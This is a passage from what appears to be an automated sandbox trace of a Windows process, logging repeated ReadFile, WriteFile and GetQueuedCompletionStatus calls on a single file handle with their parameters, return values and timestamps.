lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.272] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.273] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.273] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.291] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.292] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.294] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.294] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.295] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.296] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.298] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.298] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.321] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.323] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.325] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.325] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.327] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.329] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.331] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.331] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.343] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.346] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.347] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.347] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.381] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.383] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.385] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.385] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.397] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.400] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.401] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.401] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.403] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.406] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.407] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.407] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.419] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.421] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.422] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.422] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.424] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.425] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.426] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.426] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.456] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.458] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.459] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.459] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.461] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.462] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.463] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.464] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.473] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.475] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.476] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.477] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.494] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.495] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.497] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.497] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.514] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.516] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.517] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.517] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.527] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.529] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.530] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.530] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.553] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.554] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.556] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.556] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.557] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.559] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.560] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.560] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.578] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.579] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.580] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.580] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.582] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.583] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.585] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.585] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.598] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.609] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.610] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.610] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.612] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.613] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0142.615] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0142.615] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0142.624] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, 